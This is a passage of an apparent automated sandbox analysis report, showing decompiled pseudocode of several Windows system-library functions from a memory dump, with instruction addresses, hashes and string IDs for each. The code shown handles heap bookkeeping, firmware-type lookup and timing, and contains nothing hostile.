                                                                        			E0159E539(unsigned int* __ecx, intOrPtr __edx, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v40;
				char _v44;
				intOrPtr _v48;
				signed int _v52;
				unsigned int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				signed int _v72;
				void* __ebx;
				void* __edi;
				char _t87;
				signed int _t90;
				signed int _t94;
				signed int _t100;
				intOrPtr* _t113;
				signed int _t122;
				void* _t132;
				void* _t135;
				signed int _t139;
				signed int* _t141;
				signed int _t146;
				signed int _t147;
				void* _t153;
				signed int _t155;
				signed int _t159;
				char _t166;
				void* _t172;
				void* _t176;
				signed int _t177;
				intOrPtr* _t179;

				_t179 = __ecx;
				_v48 = __edx;
				_v68 = 0;
				_v72 = 0;
				_push(__ecx[1]);
				_push( *__ecx);
				_push(0);
				_t153 = 0x14;
				_t135 = _t153;
				_t132 = E0159BBBB(_t135, _t153);
				if(_t132 == 0) {
					_t166 = _v68;
					goto L43;
				} else {
					_t155 = 0;
					_v52 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v56 = __ecx[1];
					if( *__ecx >> 8 < 2) {
						_t155 = 1;
						_v52 = 1;
					}
					_t139 = _a4;
					_t87 = (_t155 << 0xc) + _t139;
					_v60 = _t87;
					if(_t87 < _t139) {
						L11:
						_t166 = _v68;
						L12:
						if(_t132 != 0) {
							E0159BCD2(_t132,  *_t179,  *((intOrPtr*)(_t179 + 4)));
						}
						L43:
						if(_v72 != 0) {
							_push( *((intOrPtr*)(_t179 + 4)));
							_push( *_t179);
							_push(0x8000);
							E0159AFDE( &_v72,  &_v60);
						}
						L46:
						return _t166;
					}
					_t90 =  *(_t179 + 0xc) & 0x40000000;
					asm("sbb edi, edi");
					_t172 = ( ~_t90 & 0x0000003c) + 4;
					if(_t90 != 0) {
						_push(0);
						_push(0x14);
						_push( &_v44);
						_push(3);
						_push(_t179);
						_push(0xffffffff);
						if(E01519730() < 0 || (_v40 & 0x00000060) == 0 || _v44 != _t179) {
							_push(_t139);
							E0159A80D(_t179, 1, _v40, 0);
							_t172 = 4;
						}
					}
					_t141 =  &_v72;
					if(E0159A854(_t141,  &_v60, 0, 0x2000, _t172, _t179,  *_t179,  *((intOrPtr*)(_t179 + 4))) >= 0) {
						_v64 = _a4;
						_t94 =  *(_t179 + 0xc) & 0x40000000;
						asm("sbb edi, edi");
						_t176 = ( ~_t94 & 0x0000003c) + 4;
						if(_t94 != 0) {
							_push(0);
							_push(0x14);
							_push( &_v24);
							_push(3);
							_push(_t179);
							_push(0xffffffff);
							if(E01519730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t179) {
								_push(_t141);
								E0159A80D(_t179, 1, _v20, 0);
								_t176 = 4;
							}
						}
						if(E0159A854( &_v72,  &_v64, 0, 0x1000, _t176, 0,  *_t179,  *((intOrPtr*)(_t179 + 4))) < 0) {
							goto L11;
						} else {
							_t177 = _v64;
							 *((intOrPtr*)(_t132 + 0xc)) = _v72;
							_t100 = _v52 + _v52;
							_t146 =  *(_t132 + 0x10) & 0x00000ffd | _t177 & 0xfffff000 | _t100;
							 *(_t132 + 0x10) = _t146;
							asm("bsf eax, [esp+0x18]");
							_v52 = _t100;
							 *(_t132 + 0x10) = (_t100 << 0x00000002 ^ _t146) & 0x000000fc ^ _t146;
							 *((short*)(_t132 + 0xc)) = _t177 - _v48;
							_t47 =  &_a8;
							 *_t47 = _a8 & 0x00000001;
							if( *_t47 == 0) {
								E014F2280(_t179 + 0x30, _t179 + 0x30);
							}
							_t147 =  *(_t179 + 0x34);
							_t159 =  *(_t179 + 0x38) & 1;
							_v68 = 0;
							if(_t147 == 0) {
								L35:
								E014EB090(_t179 + 0x34, _t147, _v68, _t132);
								if(_a8 == 0) {
									E014EFFB0(_t132, _t177, _t179 + 0x30);
								}
								asm("lock xadd [eax], ecx");
								asm("lock xadd [eax], edx");
								_t132 = 0;
								_v72 = _v72 & 0;
								_v68 = _v72;
								if(E014F7D50() == 0) {
									_t113 = 0x7ffe0388;
								} else {
									_t177 = _v64;
									_t113 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
								}
								if( *_t113 == _t132) {
									_t166 = _v68;
									goto L46;
								} else {
									_t166 = _v68;
									E0158FEC0(_t132, _t179, _t166, _t177 + 0x1000);
									goto L12;
								}
							} else {
								L23:
								while(1) {
									if(_v72 < ( *(_t147 + 0xc) & 0xffff0000)) {
										_t122 =  *_t147;
										if(_t159 == 0) {
											L32:
											if(_t122 == 0) {
												L34:
												_v68 = 0;
												goto L35;
											}
											L33:
											_t147 = _t122;
											continue;
										}
										if(_t122 == 0) {
											goto L34;
										}
										_t122 = _t122 ^ _t147;
										goto L32;
									}
									_t122 =  *(_t147 + 4);
									if(_t159 == 0) {
										L27:
										if(_t122 != 0) {
											goto L33;
										}
										L28:
										_v68 = 1;
										goto L35;
									}
									if(_t122 == 0) {
										goto L28;
									}
									_t122 = _t122 ^ _t147;
									goto L27;
								}
							}
						}
					}
					_v72 = _v72 & 0x00000000;
					goto L11;
				}
			}




































                                                                        0x0159e547
                                                                        0x0159e549
                                                                        0x0159e54f
                                                                        0x0159e553
                                                                        0x0159e557
                                                                        0x0159e55a
                                                                        0x0159e55c
                                                                        0x0159e55f
                                                                        0x0159e561
                                                                        0x0159e567
                                                                        0x0159e56b
                                                                        0x0159e7e2
                                                                        0x00000000
                                                                        0x0159e571
                                                                        0x0159e575
                                                                        0x0159e577
                                                                        0x0159e57b
                                                                        0x0159e57c
                                                                        0x0159e57d
                                                                        0x0159e57e
                                                                        0x0159e57f
                                                                        0x0159e588
                                                                        0x0159e58f
                                                                        0x0159e591
                                                                        0x0159e592
                                                                        0x0159e592
                                                                        0x0159e596
                                                                        0x0159e59e
                                                                        0x0159e5a0
                                                                        0x0159e5a6
                                                                        0x0159e61d
                                                                        0x0159e61d
                                                                        0x0159e621
                                                                        0x0159e623
                                                                        0x0159e630
                                                                        0x0159e630
                                                                        0x0159e7e6
                                                                        0x0159e7eb
                                                                        0x0159e7ed
                                                                        0x0159e7f4
                                                                        0x0159e7fa
                                                                        0x0159e7ff
                                                                        0x0159e7ff
                                                                        0x0159e80a
                                                                        0x0159e812
                                                                        0x0159e812
                                                                        0x0159e5ab
                                                                        0x0159e5b4
                                                                        0x0159e5b9
                                                                        0x0159e5be
                                                                        0x0159e5c0
                                                                        0x0159e5c2
                                                                        0x0159e5c8
                                                                        0x0159e5c9
                                                                        0x0159e5cb
                                                                        0x0159e5cc
                                                                        0x0159e5d5
                                                                        0x0159e5e4
                                                                        0x0159e5f1
                                                                        0x0159e5f8
                                                                        0x0159e5f8
                                                                        0x0159e5d5
                                                                        0x0159e602
                                                                        0x0159e616
                                                                        0x0159e63d
                                                                        0x0159e644
                                                                        0x0159e64d
                                                                        0x0159e652
                                                                        0x0159e657
                                                                        0x0159e659
                                                                        0x0159e65b
                                                                        0x0159e661
                                                                        0x0159e662
                                                                        0x0159e664
                                                                        0x0159e665
                                                                        0x0159e66e
                                                                        0x0159e67d
                                                                        0x0159e68a
                                                                        0x0159e691
                                                                        0x0159e691
                                                                        0x0159e66e
                                                                        0x0159e6b0
                                                                        0x00000000
                                                                        0x0159e6b6
                                                                        0x0159e6bd
                                                                        0x0159e6c7
                                                                        0x0159e6d7
                                                                        0x0159e6d9
                                                                        0x0159e6db
                                                                        0x0159e6de
                                                                        0x0159e6e3
                                                                        0x0159e6f3
                                                                        0x0159e6fc
                                                                        0x0159e700
                                                                        0x0159e700
                                                                        0x0159e704
                                                                        0x0159e70a
                                                                        0x0159e70a
                                                                        0x0159e713
                                                                        0x0159e716
                                                                        0x0159e719
                                                                        0x0159e720
                                                                        0x0159e761
                                                                        0x0159e76b
                                                                        0x0159e774
                                                                        0x0159e77a
                                                                        0x0159e77a
                                                                        0x0159e78a
                                                                        0x0159e791
                                                                        0x0159e799
                                                                        0x0159e79b
                                                                        0x0159e79f
                                                                        0x0159e7aa
                                                                        0x0159e7c0
                                                                        0x0159e7ac
                                                                        0x0159e7b2
                                                                        0x0159e7b9
                                                                        0x0159e7b9
                                                                        0x0159e7c7
                                                                        0x0159e806
                                                                        0x00000000
                                                                        0x0159e7c9
                                                                        0x0159e7d1
                                                                        0x0159e7d8
                                                                        0x00000000
                                                                        0x0159e7d8
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0159e722
                                                                        0x0159e72e
                                                                        0x0159e748
                                                                        0x0159e74c
                                                                        0x0159e754
                                                                        0x0159e756
                                                                        0x0159e75c
                                                                        0x0159e75c
                                                                        0x00000000
                                                                        0x0159e75c
                                                                        0x0159e758
                                                                        0x0159e758
                                                                        0x00000000
                                                                        0x0159e758
                                                                        0x0159e750
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0159e752
                                                                        0x00000000
                                                                        0x0159e752
                                                                        0x0159e730
                                                                        0x0159e735
                                                                        0x0159e73d
                                                                        0x0159e73f
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0159e741
                                                                        0x0159e741
                                                                        0x00000000
                                                                        0x0159e741
                                                                        0x0159e739
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0159e73b
                                                                        0x00000000
                                                                        0x0159e73b
                                                                        0x0159e722
                                                                        0x0159e720
                                                                        0x0159e6b0
                                                                        0x0159e618
                                                                        0x00000000
                                                                        0x0159e618

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.729115737.00000000014B0000.00000040.00000001.sdmp, Offset: 014B0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: `$`
                                                                        • API String ID: 0-197956300
                                                                        • Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                                                        • Instruction ID: 764c53da9709b230bca8fdfd1693154e680bf866dea14316edd37ab8766e9800
                                                                        • Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                                                        • Instruction Fuzzy Hash: 6A915C312043429BEB25CF29C942B5BBBE5FF84714F14892DF695CA290E774E904CB93
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 015551BE, Relevance: 2.7, Strings: 2, Instructions: 173COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 77%
                                                                        			E015551BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				signed short* _t63;
				signed int _t64;
				signed int _t65;
				signed int _t67;
				intOrPtr _t74;
				intOrPtr _t84;
				intOrPtr _t88;
				intOrPtr _t94;
				void* _t100;
				void* _t103;
				intOrPtr _t105;
				signed int _t106;
				short* _t108;
				signed int _t110;
				signed int _t113;
				signed int* _t115;
				signed short* _t117;
				void* _t118;
				void* _t119;

				_push(0x80);
				_push(0x15b05f0);
				E0152D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
				_t115 =  *(_t118 + 0xc);
				 *(_t118 - 0x7c) = _t115;
				 *((char*)(_t118 - 0x65)) = 0;
				 *((intOrPtr*)(_t118 - 0x64)) = 0;
				_t113 = 0;
				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
				 *((intOrPtr*)(_t118 - 4)) = 0;
				_t100 = __ecx;
				if(_t100 == 0) {
					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
					E014EEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *((char*)(_t118 - 0x65)) = 1;
					_t63 =  *(_t118 - 0x90);
					_t101 = _t63[2];
					_t64 =  *_t63 & 0x0000ffff;
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					L20:
					_t65 = _t64 >> 1;
					L21:
					_t108 =  *((intOrPtr*)(_t118 - 0x80));
					if(_t108 == 0) {
						L27:
						 *_t115 = _t65 + 1;
						_t67 = 0xc0000023;
						L28:
						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
						L29:
						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
						E015553CA(0);
						return E0152D130(0, _t113, _t115);
					}
					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
							 *_t108 = 0;
						}
						goto L27;
					}
					 *_t115 = _t65;
					_t115 = _t65 + _t65;
					E0151F3E0(_t108, _t101, _t115);
					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
					_t67 = 0;
					goto L28;
				}
				_t103 = _t100 - 1;
				if(_t103 == 0) {
					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
					_t74 = E014F3690(1, _t117, 0x14b1810, _t118 - 0x74);
					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
					_t101 = _t117[2];
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					if(_t74 < 0) {
						_t64 =  *_t117 & 0x0000ffff;
						_t115 =  *(_t118 - 0x7c);
						goto L20;
					}
					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
					_t115 =  *(_t118 - 0x7c);
					goto L21;
				}
				if(_t103 == 1) {
					_t105 = 4;
					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
					 *((intOrPtr*)(_t118 - 0x70)) = 0;
					_push(_t118 - 0x70);
					_push(0);
					_push(0);
					_push(_t105);
					_push(_t118 - 0x78);
					_push(0x6b);
					 *((intOrPtr*)(_t118 - 0x64)) = E0151AA90();
					 *((intOrPtr*)(_t118 - 0x64)) = 0;
					_t113 = L014F4620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
					if(_t113 != 0) {
						_push(_t118 - 0x70);
						_push( *((intOrPtr*)(_t118 - 0x70)));
						_push(_t113);
						_push(4);
						_push(_t118 - 0x78);
						_push(0x6b);
						_t84 = E0151AA90();
						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
						if(_t84 < 0) {
							goto L29;
						}
						_t110 = 0;
						_t106 = 0;
						while(1) {
							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
							 *(_t118 - 0x88) = _t106;
							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
								break;
							}
							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
							_t106 = _t106 + 1;
						}
						_t88 = E0155500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
						_t119 = _t119 + 0x1c;
						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
						if(_t88 < 0) {
							goto L29;
						}
						_t101 = _t118 - 0x3c;
						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
						goto L21;
					}
					_t67 = 0xc0000017;
					goto L28;
				}
				_push(0);
				_push(0x20);
				_push(_t118 - 0x60);
				_push(0x5a);
				_t94 = E01519860();
				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
				if(_t94 < 0) {
					goto L29;
				}
				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
					_t101 = L"Legacy";
					_push(6);
				} else {
					_t101 = L"UEFI";
					_push(4);
				}
				_pop(_t65);
				goto L21;
			}






















                                                                        0x015551be
                                                                        0x015551c3
                                                                        0x015551c8
                                                                        0x015551cd
                                                                        0x015551d0
                                                                        0x015551d3
                                                                        0x015551d8
                                                                        0x015551db
                                                                        0x015551de
                                                                        0x015551e0
                                                                        0x015551e3
                                                                        0x015551e6
                                                                        0x015551e8
                                                                        0x01555342
                                                                        0x01555351
                                                                        0x01555356
                                                                        0x0155535a
                                                                        0x01555360
                                                                        0x01555363
                                                                        0x01555366
                                                                        0x01555369
                                                                        0x01555369
                                                                        0x0155536b
                                                                        0x0155536b
                                                                        0x01555370
                                                                        0x015553a3
                                                                        0x015553a4
                                                                        0x015553a6
                                                                        0x015553ab
                                                                        0x015553ab
                                                                        0x015553ae
                                                                        0x015553ae
                                                                        0x015553b5
                                                                        0x015553bf
                                                                        0x015553bf
                                                                        0x01555375
                                                                        0x01555396
                                                                        0x015553a0
                                                                        0x015553a0
                                                                        0x00000000
                                                                        0x01555396
                                                                        0x01555377
                                                                        0x01555379
                                                                        0x0155537f
                                                                        0x0155538c
                                                                        0x01555390
                                                                        0x00000000
                                                                        0x01555390
                                                                        0x015551ee
                                                                        0x015551f1
                                                                        0x01555301
                                                                        0x01555310
                                                                        0x01555315
                                                                        0x01555318
                                                                        0x0155531b
                                                                        0x01555320
                                                                        0x0155532e
                                                                        0x01555331
                                                                        0x00000000
                                                                        0x01555331
                                                                        0x01555328
                                                                        0x01555329
                                                                        0x00000000
                                                                        0x01555329
                                                                        0x015551fa
                                                                        0x01555235
                                                                        0x01555236
                                                                        0x01555239
                                                                        0x0155523f
                                                                        0x01555240
                                                                        0x01555241
                                                                        0x01555242
                                                                        0x01555246
                                                                        0x01555247
                                                                        0x0155524e
                                                                        0x01555251
                                                                        0x01555267
                                                                        0x01555269
                                                                        0x0155526e
                                                                        0x0155527d
                                                                        0x0155527e
                                                                        0x01555281
                                                                        0x01555282
                                                                        0x01555287
                                                                        0x01555288
                                                                        0x0155528a
                                                                        0x0155528f
                                                                        0x01555294
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0155529a
                                                                        0x0155529c
                                                                        0x0155529e
                                                                        0x0155529e
                                                                        0x015552a4
                                                                        0x015552b0
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x015552ba
                                                                        0x015552bc
                                                                        0x015552bc
                                                                        0x015552d4
                                                                        0x015552d9
                                                                        0x015552dc
                                                                        0x015552e1
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x015552e7
                                                                        0x015552f4
                                                                        0x00000000
                                                                        0x015552f4
                                                                        0x01555270
                                                                        0x00000000
                                                                        0x01555270
                                                                        0x015551fc
                                                                        0x015551fd
                                                                        0x01555202
                                                                        0x01555203
                                                                        0x01555205
                                                                        0x0155520a
                                                                        0x0155520f
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0155521b
                                                                        0x01555226
                                                                        0x0155522b
                                                                        0x0155521d
                                                                        0x0155521d
                                                                        0x01555222
                                                                        0x01555222
                                                                        0x0155522d
                                                                        0x00000000

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.729115737.00000000014B0000.00000040.00000001.sdmp, Offset: 014B0000, based on PE: true
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID: Legacy$UEFI
                                                                        • API String ID: 2994545307-634100481
                                                                        • Opcode ID: ef30659ee5ee88ba8f3e94f97cf1fc51052b4d38fab278472f96bd9a9e03519f
                                                                        • Instruction ID: 3d023af478b1314f81d10162a3dd89613cc8c4e6c0a5b3d9415eef282ed44ed2
                                                                        • Opcode Fuzzy Hash: ef30659ee5ee88ba8f3e94f97cf1fc51052b4d38fab278472f96bd9a9e03519f
                                                                        • Instruction Fuzzy Hash: C5517F71E106099FDB65DFA8C890AADBBF4FF48740F15442EEA49EF252E6709940CB10
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 014FB944, Relevance: 1.7, APIs: 1, Instructions: 166COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 76%
                                                                        			E014FB944(signed int* __ecx, char __edx) {
				signed int _v8;
				signed int _v16;
				signed int _v20;
				char _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int* _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				char _v77;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t65;
				intOrPtr _t67;
				intOrPtr _t68;
				char* _t73;
				intOrPtr _t77;
				intOrPtr _t78;
				signed int _t82;
				intOrPtr _t83;
				void* _t87;
				char _t88;
				intOrPtr* _t89;
				intOrPtr _t91;
				void* _t97;
				intOrPtr _t100;
				void* _t102;
				void* _t107;
				signed int _t108;
				intOrPtr* _t112;
				void* _t113;
				intOrPtr* _t114;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr _t117;
				signed int _t118;
				void* _t130;

				_t120 = (_t118 & 0xfffffff8) - 0x4c;
				_v8 =  *0x15cd360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
				_t112 = __ecx;
				_v77 = __edx;
				_v48 = __ecx;
				_v28 = 0;
				_t5 = _t112 + 0xc; // 0x575651ff
				_t105 =  *_t5;
				_v20 = 0;
				_v16 = 0;
				if(_t105 == 0) {
					_t50 = _t112 + 4; // 0x5de58b5b
					_t60 =  *__ecx |  *_t50;
					if(( *__ecx |  *_t50) != 0) {
						 *__ecx = 0;
						__ecx[1] = 0;
						if(E014F7D50() != 0) {
							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t65 = 0x7ffe0386;
						}
						if( *_t65 != 0) {
							E015A8CD6(_t112);
						}
						_push(0);
						_t52 = _t112 + 0x10; // 0x778df98b
						_push( *_t52);
						_t60 = E01519E20();
					}
					L20:
					_pop(_t107);
					_pop(_t113);
					_pop(_t87);
					return E0151B640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
				}
				_t8 = _t112 + 8; // 0x8b000cc2
				_t67 =  *_t8;
				_t88 =  *((intOrPtr*)(_t67 + 0x10));
				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
				_t108 =  *(_t67 + 0x14);
				_t68 =  *((intOrPtr*)(_t105 + 0x14));
				_t105 = 0x2710;
				asm("sbb eax, edi");
				_v44 = _t88;
				_v52 = _t108;
				_t60 = E0151CE00(_t97, _t68, 0x2710, 0);
				_v56 = _t60;
				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
					L3:
					 *(_t112 + 0x44) = _t60;
					_t105 = _t60 * 0x2710 >> 0x20;
					 *_t112 = _t88;
					 *(_t112 + 4) = _t108;
					_v20 = _t60 * 0x2710;
					_v16 = _t60 * 0x2710 >> 0x20;
					if(_v77 != 0) {
						L16:
						_v36 = _t88;
						_v32 = _t108;
						if(E014F7D50() != 0) {
							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t73 = 0x7ffe0386;
						}
						if( *_t73 != 0) {
							_t105 = _v40;
							E015A8F6A(_t112, _v40, _t88, _t108);
						}
						_push( &_v28);
						_push(0);
						_push( &_v36);
						_t48 = _t112 + 0x10; // 0x778df98b
						_push( *_t48);
						_t60 = E0151AF60();
						goto L20;
					} else {
						_t89 = 0x7ffe03b0;
						do {
							_t114 = 0x7ffe0010;
							do {
								_t77 =  *0x15c8628; // 0x0
								_v68 = _t77;
								_t78 =  *0x15c862c; // 0x0
								_v64 = _t78;
								_v72 =  *_t89;
								_v76 =  *((intOrPtr*)(_t89 + 4));
								while(1) {
									_t105 =  *0x7ffe000c;
									_t100 =  *0x7ffe0008;
									if(_t105 ==  *_t114) {
										goto L8;
									}
									asm("pause");
								}
								L8:
								_t89 = 0x7ffe03b0;
								_t115 =  *0x7ffe03b0;
								_t82 =  *0x7FFE03B4;
								_v60 = _t115;
								_t114 = 0x7ffe0010;
								_v56 = _t82;
							} while (_v72 != _t115 || _v76 != _t82);
							_t83 =  *0x15c8628; // 0x0
							_t116 =  *0x15c862c; // 0x0
							_v76 = _t116;
							_t117 = _v68;
						} while (_t117 != _t83 || _v64 != _v76);
						asm("sbb edx, [esp+0x24]");
						_t102 = _t100 - _v60 - _t117;
						_t112 = _v48;
						_t91 = _v44;
						asm("sbb edx, eax");
						_t130 = _t105 - _v52;
						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
							_t88 = _t102 - _t91;
							asm("sbb edx, edi");
							_t108 = _t105;
						} else {
							_t88 = 0;
							_t108 = 0;
						}
						goto L16;
					}
				} else {
					if( *(_t112 + 0x44) == _t60) {
						goto L20;
					}
					goto L3;
				}
			}
















































                                                                        0x014fb94c
                                                                        0x014fb956
                                                                        0x014fb95c
                                                                        0x014fb95e
                                                                        0x014fb964
                                                                        0x014fb969
                                                                        0x014fb96d
                                                                        0x014fb96d
                                                                        0x014fb970
                                                                        0x014fb974
                                                                        0x014fb97a
                                                                        0x014fbadf
                                                                        0x014fbadf
                                                                        0x014fbae2
                                                                        0x014fbae4
                                                                        0x014fbae6
                                                                        0x014fbaf0
                                                                        0x01542cb8
                                                                        0x014fbaf6
                                                                        0x014fbaf6
                                                                        0x014fbaf6
                                                                        0x014fbafd
                                                                        0x014fbb1f
                                                                        0x014fbb1f
                                                                        0x014fbaff
                                                                        0x014fbb00
                                                                        0x014fbb00
                                                                        0x014fbb03
                                                                        0x014fbb03
                                                                        0x014fbacb
                                                                        0x014fbacf
                                                                        0x014fbad0
                                                                        0x014fbad1
                                                                        0x014fbadc
                                                                        0x014fbadc
                                                                        0x014fb980
                                                                        0x014fb980
                                                                        0x014fb988
                                                                        0x014fb98b
                                                                        0x014fb98d
                                                                        0x014fb990
                                                                        0x014fb993
                                                                        0x014fb999
                                                                        0x014fb99b
                                                                        0x014fb9a1
                                                                        0x014fb9a5
                                                                        0x014fb9aa
                                                                        0x014fb9b0
                                                                        0x014fb9bb
                                                                        0x014fb9c0
                                                                        0x014fb9c3
                                                                        0x014fb9ca
                                                                        0x014fb9cc
                                                                        0x014fb9cf
                                                                        0x014fb9d3
                                                                        0x014fb9d7
                                                                        0x014fba94
                                                                        0x014fba94
                                                                        0x014fba98
                                                                        0x014fbaa3
                                                                        0x01542ccb
                                                                        0x014fbaa9
                                                                        0x014fbaa9
                                                                        0x014fbaa9
                                                                        0x014fbab1
                                                                        0x01542cd5
                                                                        0x01542cdd
                                                                        0x01542cdd
                                                                        0x014fbabb
                                                                        0x014fbabc
                                                                        0x014fbac2
                                                                        0x014fbac3
                                                                        0x014fbac3
                                                                        0x014fbac6
                                                                        0x00000000
                                                                        0x014fb9dd
                                                                        0x014fb9dd
                                                                        0x014fb9e7
                                                                        0x014fb9e7
                                                                        0x014fb9ec
                                                                        0x014fb9ec
                                                                        0x014fb9f1
                                                                        0x014fb9f5
                                                                        0x014fb9fa
                                                                        0x014fba00
                                                                        0x014fba0c
                                                                        0x014fba10
                                                                        0x014fba10
                                                                        0x014fba12
                                                                        0x014fba18
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x014fbb26
                                                                        0x014fbb26
                                                                        0x014fba1e
                                                                        0x014fba1e
                                                                        0x014fba23
                                                                        0x014fba25
                                                                        0x014fba2c
                                                                        0x014fba30
                                                                        0x014fba35
                                                                        0x014fba35
                                                                        0x014fba41
                                                                        0x014fba46
                                                                        0x014fba4c
                                                                        0x014fba50
                                                                        0x014fba54
                                                                        0x014fba6a
                                                                        0x014fba6e
                                                                        0x014fba70
                                                                        0x014fba74
                                                                        0x014fba78
                                                                        0x014fba7a
                                                                        0x014fba7c
                                                                        0x014fba8e
                                                                        0x014fba90
                                                                        0x014fba92
                                                                        0x014fbb14
                                                                        0x014fbb14
                                                                        0x014fbb16
                                                                        0x014fbb16
                                                                        0x00000000
                                                                        0x014fba7c
                                                                        0x014fbb0a
                                                                        0x014fbb0d
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x014fbb0f

                                                                        APIs
                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 014FB9A5
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.729115737.00000000014B0000.00000040.00000001.sdmp, Offset: 014B0000, based on PE: true
                                                                        Similarity
                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                        • String ID:
                                                                        • API String ID: 885266447-0
                                                                        • Opcode ID: 807acfe2e5e9f958e44f0fc0dbc599bff4d993b2f5e617727798964175f00f37
                                                                        • Instruction ID: 37593465320ceff35a141676457a82decc94bcb97cf288692797a7f68c6b5c04
                                                                        • Opcode Fuzzy Hash: 807acfe2e5e9f958e44f0fc0dbc599bff4d993b2f5e617727798964175f00f37
                                                                        • Instruction Fuzzy Hash: B2516671A08741CFC721CF29C48092BBBF5FB89600F15896EFA958B365D730E848CB92
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 014DB171, Relevance: 1.7, APIs: 1, Instructions: 166COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 78%
                                                                        			E014DB171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
				signed int _t65;
				signed short _t69;
				intOrPtr _t70;
				signed short _t85;
				void* _t86;
				signed short _t89;
				signed short _t91;
				intOrPtr _t92;
				intOrPtr _t97;
				intOrPtr* _t98;
				signed short _t99;
				signed short _t101;
				void* _t102;
				char* _t103;
				signed short _t104;
				intOrPtr* _t110;
				void* _t111;
				void* _t114;
				intOrPtr* _t115;

				_t109 = __esi;
				_t108 = __edi;
				_t106 = __edx;
				_t95 = __ebx;
				_push(0x90);
				_push(0x15af7a8);
				E0152D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
				if(__edx == 0xffffffff) {
					L6:
					_t97 =  *((intOrPtr*)(_t114 - 0x78));
					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
